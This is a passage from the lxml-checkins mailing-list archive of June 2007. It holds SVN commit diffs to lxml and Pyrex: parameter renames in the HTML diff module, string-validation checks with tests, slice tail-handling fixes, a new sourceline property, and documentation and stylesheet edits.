class_name = el.get('class') if class_name: dont_break = False class_name = class_name.split() Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Sat Jun 9 16:44:51 2007 @@ -516,7 +516,7 @@ included as a special kind of diffable token.""" body_el = parse_html(html, cleanup=True) # Then we split the document into text chunks for each tag, word, and end tag: - chunks = flatten_el(body_el, drop_tag=True, include_hrefs=include_hrefs) + chunks = flatten_el(body_el, skip_tag=True, include_hrefs=include_hrefs) # Finally re-joining them into token objects: return fixup_chunks(chunks) @@ -657,14 +657,14 @@ ) -def flatten_el(el, include_hrefs, drop_tag=False): +def flatten_el(el, include_hrefs, skip_tag=False): """ Takes an lxml element el, and generates all the text chunks for that tag. Each start tag is a chunk, each word is a chunk, and each end tag is a chunk. - If drop_tag is true, then the outermost container tag is + If skip_tag is true, then the outermost container tag is not returned (just its contents).""" - if not drop_tag: + if not skip_tag: if el.tag == 'img': yield ('img', el.attrib['src'], start_tag(el)) else: @@ -679,7 +679,7 @@ yield item if el.tag == 'a' and el.attrib.get('href') and include_hrefs: yield ('href', el.attrib['href']) - if not drop_tag: + if not skip_tag: yield end_tag(el) end_words = split_words(el.tail) for word in end_words: @@ -729,14 +729,14 @@ <p><ins>word</ins></p> """ doc = parse_html(html, cleanup=False) _fixup_ins_del_tags(doc) - html = serialize_html_fragment(doc, drop_outer=True) + html = serialize_html_fragment(doc, skip_outer=True) return html -def serialize_html_fragment(el, drop_outer=False): +def serialize_html_fragment(el, skip_outer=False): """ Serialize a single lxml element as HTML. The serialized form includes the elements tail. - If drop_outer is true, then don't serialize the outermost tag + If skip_outer is true, then don't serialize the outermost tag """ html_xsl = """\ @@ -751,13 +751,13 @@ assert not isinstance(el, basestring), ( "You should pass in an element, not a string like %r" % el) html = str(transform(el)) - if drop_outer: + if skip_outer: # Get rid of the extra starting tag: html = html[html.find('>')+1:] - if drop_outer: + if skip_outer: # Get rid of the extra end tag: html = html[:html.rfind('<')] - if drop_outer: + if skip_outer: return html.strip() else: return html.lstrip() @@ -770,7 +770,7 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - el.drop_tag() + el.drop_element() #_merge_element_contents(el) def _contains_block_level_tag(el): Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Sat Jun 9 16:44:51 2007 @@ -52,7 +52,7 @@ >>> el.text_content() 'This is a bold link' -Or drop both tags (leaving content) or the entire element, like:: +Or drop an element (leaving its content) or the entire tree, like:: >>> doc = HTML(''' ... <html> @@ -63,7 +63,7 @@ ... <div>footer</div> ... </body> ... </html>''') - >>> doc.get_element_by_id('link').drop_tag() + >>> doc.get_element_by_id('link').drop_element() >>> print tostring(doc) <html> <body> @@ -73,7 +73,7 @@ <div>footer</div> </body> </html> - >>> doc.get_element_by_id('body').drop_element() + >>> doc.get_element_by_id('body').drop_tree() >>> print tostring(doc) <html> <body> From scoder at codespeak.net Sat Jun 9 16:52:59 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:52:59 +0200 (CEST) Subject: [Lxml-checkins] r44116 - lxml/trunk/src/lxml Message-ID: <20070609145259.BF74380D0@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:52:58 2007 New Revision: 44116 Modified: lxml/trunk/src/lxml/parser.pxi Log: missing kw arg default value Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Sat Jun 9 16:52:58 2007 @@ -778,7 +778,7 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(parser): +def setDefaultParser(parser=None): "Deprecated, please use set_default_parser instead." set_default_parser(parser) From scoder at codespeak.net Sat Jun 9 16:55:11 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sat, 9 Jun 2007 16:55:11 +0200 (CEST) Subject: [Lxml-checkins] r44117 - in lxml/trunk: . src/lxml src/lxml/tests Message-ID: <20070609145511.58E3E80D0@code0.codespeak.net> Author: scoder Date: Sat Jun 9 16:55:10 2007 New Revision: 44117 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/tree.pxd Log: check incoming strings for low ASCII characters Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Sat Jun 9 16:55:10 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted. + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Sat Jun 9 16:55:10 2007 @@ -595,16 +595,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] + if c & 0x80: + is_non_ascii = 1 if c == c'\0': return -1 # invalid! - if c & 0x80: - return 1 # non-ASCII + if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -625,12 +629,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... + s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." + return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Sat Jun 9 16:55:10 2007 @@ -1433,6 +1433,41 @@ self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring Modified: lxml/trunk/src/lxml/tree.pxd ============================================================================== --- lxml/trunk/src/lxml/tree.pxd (original) +++ lxml/trunk/src/lxml/tree.pxd Sat Jun 9 16:55:10 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) From scoder at codespeak.net Sun Jun 10 14:44:11 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 10 Jun 2007 14:44:11 +0200 (CEST) Subject: [Lxml-checkins] r44123 - lxml/branch/proxy-dealloc Message-ID: <20070610124411.D4ACD80CB@code0.codespeak.net> Author: scoder Date: Sun Jun 10 14:44:10 2007 New Revision: 44123 Added: lxml/branch/proxy-dealloc/ - copied from r44122, lxml/trunk/ Log: new branch for a partial rewrite of the proxy cleanup code From scoder at codespeak.net Sun Jun 10 16:41:06 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 10 Jun 2007 16:41:06 +0200 (CEST) Subject: [Lxml-checkins] r44124 - lxml/pyrex/Pyrex/Compiler Message-ID: <20070610144106.2928B8100@code0.codespeak.net> Author: scoder Date: Sun Jun 10 16:41:04 2007 New Revision: 44124 Modified: lxml/pyrex/Pyrex/Compiler/ModuleNode.py Log: bug fix by Arc Riley Modified: lxml/pyrex/Pyrex/Compiler/ModuleNode.py ============================================================================== --- lxml/pyrex/Pyrex/Compiler/ModuleNode.py (original) +++ lxml/pyrex/Pyrex/Compiler/ModuleNode.py Sun Jun 10 16:41:04 2007 @@ -383,7 +383,8 @@ entry.type.typeptr_cname) code.put_var_declarations(env.var_entries, static = 1, dll_linkage = "DL_EXPORT", definition = definition) - code.put_var_declarations(env.default_entries, static = 1) + code.put_var_declarations(env.default_entries, static = 1, + definition = definition) def generate_cfunction_predeclarations(self, env, code): for entry in env.cfunc_entries: From scoder at codespeak.net Tue Jun 12 15:42:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 15:42:55 +0200 (CEST) Subject: [Lxml-checkins] r44165 - in lxml/trunk: . src/lxml src/lxml/tests Message-ID: <20070612134255.EEBFC817D@code0.codespeak.net> Author: scoder Date: Tue Jun 12 15:42:54 2007 New Revision: 44165 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/tests/test_elementtree.py Log: fix: replacing the children slice of an Element cut off the children's tails Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Tue Jun 12 15:42:54 2007 @@ -50,6 +50,9 @@ Bugs fixed ---------- +* Replacing the children slice of an Element would cut off the tails of the + original children + * API functions now check incoming strings for XML conformity. Zero bytes or low ASCII characters are no longer accepted. Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Tue Jun 12 15:42:54 2007 @@ -485,7 +485,10 @@ cdef void _removeNode(xmlNode* c_node): """Unlink and free a node and subnodes if possible. """ + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) + _moveTail(c_next, c_node) attemptDeallocation(c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): @@ -526,8 +529,8 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next _removeNode(c_node) c = c + 1 c_node = c_next Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Tue Jun 12 15:42:54 2007 @@ -486,7 +486,7 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: + if c_node is not NULL and start != stop: c_node = _deleteSlice(c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: @@ -597,8 +597,8 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next _removeNode(c_node) c_node = c_node_next Modified: lxml/trunk/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_elementtree.py (original) +++ lxml/trunk/src/lxml/tests/test_elementtree.py Tue Jun 12 15:42:54 2007 @@ -1161,6 +1161,26 @@ self.assertXML('<b><bs></bs></b>', b) self.assertXML('<c><cs></cs></c>', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('<a><b></b>B2<c></c>C2</a>') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('<a><b></b>B2<c></c>C2</a>') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('<a><b></b>B2<c></c>C2</a>') From scoder at codespeak.net Tue Jun 12 17:46:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 17:46:45 +0200 (CEST) Subject: [Lxml-checkins] r44168 - lxml/branch/lxml-1.3 Message-ID: <20070612154645.7227D8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 17:46:45 2007 New Revision: 44168 Added: lxml/branch/lxml-1.3/ - copied from r39786, lxml/trunk/ Log: new branch for work on 1.3 (to leave 2.0 stuff in the trunk) From scoder at codespeak.net Tue Jun 12 17:55:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 17:55:16 +0200 (CEST) Subject: [Lxml-checkins] r44169 - lxml/branch/lxml-1.3 Message-ID: <20070612155516.EAE928188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 17:55:11 2007 New Revision: 44169 Modified: lxml/branch/lxml-1.3/ (props changed) Log: external svn ref to Pyrex From scoder at codespeak.net Tue Jun 12 18:01:00 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:01:00 +0200 (CEST) Subject: [Lxml-checkins] r44170 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070612160100.38E3E8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:00:59 2007 New Revision: 44170 Modified: lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/extensions.pxi lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/xpath.pxi lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: merged in revs 39788:40177 from trunk Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 18:00:59 2007 @@ -41,5 +41,5 @@ Features -------- -* Relaxed NG compact notation (rnc versus rng) support. Currently not - supported by libxml2 (patch exists) +* RelaxNG compact notation (rnc versus rng) support. Currently not supported + by libxml2 (patch exists) Modified: lxml/branch/lxml-1.3/src/lxml/extensions.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/extensions.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/extensions.pxi Tue Jun 12 18:00:59 2007 @@ -102,16 +102,16 @@ # namespaces (internal UTF-8 methods with leading '_') - def addNamespace(self, prefix, uri): + cdef addNamespace(self, prefix, uri): if self._namespaces is None: self._namespaces = {} python.PyDict_SetItem(self._namespaces, prefix, uri) - def registerNamespaces(self, namespaces): + cdef registerNamespaces(self, namespaces): for prefix, uri in namespaces.items(): self.registerNamespace(prefix, uri) - def registerNamespace(self, prefix, ns_uri): + cdef registerNamespace(self, prefix, ns_uri): prefix_utf = self._to_utf(prefix) ns_uri_utf = self._to_utf(ns_uri) xpath.xmlXPathRegisterNs(self._xpathCtxt, prefix_utf, ns_uri_utf) @@ -238,12 +238,14 @@ cdef xpath.xmlXPathFunction _function_check(void* ctxt, char* c_name, char* c_ns_uri): "Module level lookup function for XPath/XSLT functions" + cdef xpath.xmlXPathFunction c_func cdef _BaseContext context context = <_BaseContext>ctxt if context._prepare_function_call(c_ns_uri, c_name): - return _call_prepared_function + c_func = _call_prepared_function else: - return NULL + c_func = NULL + return c_func cdef xpath.xmlXPathObject* _wrapXPathObject(object obj) except NULL: cdef xpath.xmlNodeSet* resultSet @@ -358,7 +360,6 @@ cdef void _extension_function_call(_BaseContext context, function, xpath.xmlXPathParserContext* ctxt, int nargs): - cdef _Element node cdef _Document doc cdef xpath.xmlXPathObject* obj cdef int i Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Tue Jun 12 18:00:59 2007 @@ -406,7 +406,7 @@ if pctxt.spaceTab is not NULL: # work around bug in libxml2 xmlparser.xmlClearParserCtxt(pctxt) - cdef int _lockParser(self) except 1: + cdef int _lockParser(self) except -1: cdef python.PyThreadState* state cdef int result if config.ENABLE_THREADING and self._parser_lock != NULL: Modified: lxml/branch/lxml-1.3/src/lxml/xpath.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xpath.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xpath.pxi Tue Jun 12 18:00:59 2007 @@ -143,9 +143,8 @@ def registerNamespaces(self, namespaces): """Register a prefix -> uri dict. """ - add = self._context.addNamespace for prefix, uri in namespaces.items(): - add(prefix, uri) + self._context.addNamespace(prefix, uri) def __call__(self, _path, **_variables): """Evaluate an XPath expression on the document. Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Tue Jun 12 18:00:59 2007 @@ -1,4 +1,4 @@ -# XSLT and XPath classes, supports for extension functions +# XSLT cimport xslt @@ -265,6 +265,15 @@ cdef class XSLT: """Turn a document into an XSLT object. + + Keyword arguments of the constructor: + * regexp - enable exslt regular expression support in XPath (default: True) + * access_control - access restrictions for network or file system + + Keyword arguments of the XSLT run: + * profile_run - enable XSLT profiling + + Other keyword arguments are passed to the stylesheet. """ cdef _XSLTContext _context cdef xslt.xsltStylesheet* _c_style @@ -415,6 +424,7 @@ if params is not NULL: # deallocate space for parameters python.PyMem_Free(params) + keep_ref = None if transform_ctxt.profile: c_profile_doc = xslt.xsltGetProfileInformation(transform_ctxt) From scoder at codespeak.net Tue Jun 12 18:02:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:02:21 +0200 (CEST) Subject: [Lxml-checkins] r44171 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612160221.AD45C8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:02:20 2007 New Revision: 44171 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in rev 40611 from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:02:20 2007 @@ -1289,7 +1289,7 @@ def relaxng(self, relaxng): """Validate this document using other document. - relaxng is a tree that should contain Relax NG XML + The relaxng argument is a tree that should contain a Relax NG schema. Returns True or False, depending on whether validation succeeded. @@ -1305,7 +1305,7 @@ def xmlschema(self, xmlschema): """Validate this document using other document. - xmlschema is a tree that should contain XML Schema XML. + The xmlschema argument is a tree that should contain an XML Schema. Returns True or False, depending on whether validation succeeded. @@ -1321,7 +1321,13 @@ def xinclude(self): """Process the XInclude nodes in this document and include the referenced XML fragments. + + There is support for loading files through the file system, HTTP and + FTP. + + Note that XInclude does not support custom resolvers in Python space. """ + cdef python.PyThreadState* state cdef int result # We cannot pass the XML_PARSE_NOXINCNODE option as this would free # the XInclude nodes - there may still be Python references to them! @@ -1331,13 +1337,15 @@ # typed as elements. The included fragment is added between the two, # i.e. as a sibling, which does not conflict with traversal. self._assertHasRoot() - if self._context_node._doc._parser != None: + state = python.PyEval_SaveThread() + if self._context_node._doc._parser is not None: result = xinclude.xmlXIncludeProcessTreeFlags( self._context_node._c_node, self._context_node._doc._parser._parse_options) else: result = xinclude.xmlXIncludeProcessTree( self._context_node._c_node) + python.PyEval_RestoreThread(state) if result == -1: raise XIncludeError, "XInclude processing failed" From scoder at codespeak.net Tue Jun 12 18:06:29 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:06:29 +0200 (CEST) Subject: [Lxml-checkins] r44172 - in lxml/branch/lxml-1.3: benchmark doc doc/html src/lxml src/lxml/tests Message-ID: <20070612160629.116658188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:06:23 2007 New Revision: 44172 Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/python.pxd lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py lxml/branch/lxml-1.3/src/lxml/tree.pxd Log: merged in revs 40611:41008 from trunk Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Tue Jun 12 18:06:23 2007 @@ -34,7 +34,7 @@ child.xpath("./*[0]") @onlylib('lxe') - def bench_xpath_extensions_old(self, root): + def bench_xpath_old_extensions(self, root): def return_child(_, element): if element: return element[0] @@ -45,5 +45,21 @@ for child in root: xpath(child) + @onlylib('lxe') + def bench_xpath_extensions(self, root): + def return_child(_, element): + if element: + return element[0] + else: + return () + self.etree.FunctionNamespace("test")["t"] = return_child + + try: + xpath = self.etree.XPath("test:t(.)", {"test":"test"}) + for child in root: + xpath(child) + finally: + del self.etree.FunctionNamespace("test")["t"] + if __name__ == '__main__': benchbase.main(XPathBenchMark) Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 18:06:23 2007 @@ -12,10 +12,11 @@ 1 General Questions 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? - 1.3 Where are the Windows binaries? - 1.4 What is the difference between lxml.etree and lxml.objectify? - 1.5 Why is my application so slow? - 1.6 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.3 What standards does lxml implement? + 1.4 Where are the Windows binaries? + 1.5 What is the difference between lxml.etree and lxml.objectify? + 1.6 Why is my application so slow? + 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Bugs 2.1 My application crashes! Why does lxml.etree do that? 2.2 I think I have found a bug in lxml. What should I do? @@ -64,6 +65,24 @@ .. _`the web page`: http://codespeak.net/lxml/#documentation +What standards does lxml implement? +----------------------------------- + +The compliance to XML Standards depends on the support in libxml2 and libxslt. +Here is a quote from `http://xmlsoft.org/`: + + In most cases libxml2 tries to implement the specifications in a relatively + strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests + from the OASIS XML Tests Suite. + +lxml currently supports libxml2 2.6.16 or later, which has even better support +for various XML standards. Some of the more important ones are: HTML, XML +namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, +XML:ID. Support for XML Schema and Schematron is currently incomplete in +libxml2, but is mostly usable and still being worked on. libxml2 also +supports loading documents through HTTP and FTP. + + Where are the Windows binaries? ------------------------------- Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 18:06:23 2007 @@ -67,10 +67,12 @@ font-size: 130%; } -div.sidemenu ul.menu.current > li { - color: orange; - border: groove orange; - background-color: #FFFACA; +div.sidemenu ul.menu.current li { + color: #CC0000; +} + +div.sidemenu ul.menu.current > li > a { + color: #CC0000; } div.sidemenu ul.menu.current ul.submenu { @@ -85,12 +87,13 @@ div.sidemenu ul.menu.foreign li.menu:hover ul.submenu { display: block; position: absolute; - border: groove orange; + border: groove #990000; padding: 1ex 1ex 1ex 3ex; margin-top: 0px; margin-left: 4em; margin-right: -20em; - background-color: #FFFACA; + color: #990000; + background-color: white; } div.sidemenu ul.submenu { @@ -121,7 +124,7 @@ @media screen { div.section > h1 > a:before { margin-left: -2ex; - color: orange; + color: #CC0000; content: "\00BB" " "; } } Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 18:06:23 2007 @@ -673,6 +673,24 @@ return None # not in ElementTree, read-only + property sourceline: + """Original line number as found by the parser or None if unknown. + """ + def __get__(self): + cdef long line + line = tree.xmlGetLineNo(self._c_node) + if line > 0: + return line + else: + return None + + def __set__(self, line): + if line < 0: + self._c_node.line = 0 + else: + self._c_node.line = line + + # not in ElementTree, read-only property nsmap: """Namespace prefix->URI mapping known in the context of this Element. """ Modified: lxml/branch/lxml-1.3/src/lxml/python.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/python.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/python.pxd Tue Jun 12 18:06:23 2007 @@ -44,7 +44,8 @@ cdef int PyList_Append(object l, object obj) except -1 cdef int PyList_Reverse(object l) except -1 cdef int PyList_Insert(object l, Py_ssize_t index, object o) except -1 - cdef object PyList_AsTuple(object o) + cdef object PyList_AsTuple(object l) + cdef void PyList_Clear(object l) cdef int PyDict_SetItemString(object d, char* key, object value) except -1 cdef int PyDict_SetItem(object d, object key, object value) except -1 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 18:06:23 2007 @@ -1119,6 +1119,37 @@ ["tail0", "tail1", "tail2", "TAIL0", "TAIL1", "TAIL2"], [ el.tail for el in root ]) + def test_sourceline_XML(self): + XML = self.etree.XML + root = XML('''<?xml version="1.0"?> + <root><test> + + <bla/></test> + </root> + ''') + + self.assertEquals( + [2, 2, 4], + [ el.sourceline for el in root.getiterator() ]) + + def test_sourceline_parse(self): + parse = self.etree.parse + tree = parse(fileInTestDir('test_xinclude.xml')) + + self.assertEquals( + [1, 2, 3], + [ el.sourceline for el in tree.getiterator() ]) + + def test_sourceline_element(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + el = Element("test") + self.assertEquals(None, el.sourceline) + + child = SubElement(el, "test") + self.assertEquals(None, el.sourceline) + self.assertEquals(None, child.sourceline) + def test_docinfo_public(self): etree = self.etree xml_header = '<?xml version="1.0" encoding="ascii"?>' Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 12 18:06:23 2007 @@ -1,10 +1,7 @@ # -*- coding: utf-8 -*- """ -Tests specific to the extended etree API - -Tests that apply to the general ElementTree API should go into -test_elementtree +Tests specific to the lxml.objectify API """ @@ -28,7 +25,7 @@ </obj:root>''' class ObjectifyTestCase(HelperTestCase): - """Test cases for lxml.elementlib.objectify + """Test cases for lxml.objectify """ etree = etree Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_xpathevaluator.py Tue Jun 12 18:06:23 2007 @@ -104,6 +104,10 @@ self.assertEquals( [root[0]], root.xpath('//baz:b', {'baz': 'uri:a'})) + + def test_xpath_ns_none(self): + tree = self.parse('<a xmlns="uri:a"><b></b></a>') + root = tree.getroot() self.assertRaises( TypeError, root.xpath, '//b', {None: 'uri:a'}) Modified: lxml/branch/lxml-1.3/src/lxml/tree.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tree.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/tree.pxd Tue Jun 12 18:06:23 2007 @@ -97,6 +97,7 @@ xmlAttr* properties xmlNs* ns xmlNs* nsDef + unsigned short line ctypedef struct xmlDtd: char* ExternalID @@ -198,6 +199,7 @@ cdef xmlNs* xmlSearchNs(xmlDoc* doc, xmlNode* node, char* prefix) cdef xmlNs* xmlSearchNsByHref(xmlDoc* doc, xmlNode* node, char* href) cdef int xmlIsBlankNode(xmlNode* node) + cdef long xmlGetLineNo(xmlNode* node) cdef void xmlElemDump(FILE* f, xmlDoc* doc, xmlNode* cur) cdef void xmlNodeDumpOutput(xmlOutputBuffer* buf, xmlDoc* doc, xmlNode* cur, int level, From scoder at codespeak.net Tue Jun 12 18:10:05 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 18:10:05 +0200 (CEST) Subject: [Lxml-checkins] r44173 - lxml/branch/lxml-1.3 Message-ID: <20070612161005.5967E8188@code0.codespeak.net> Author: scoder Date: Tue Jun 12 18:10:03 2007 New Revision: 44173 Modified: lxml/branch/lxml-1.3/CHANGES.txt Log: missing ChangeLog entries Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- 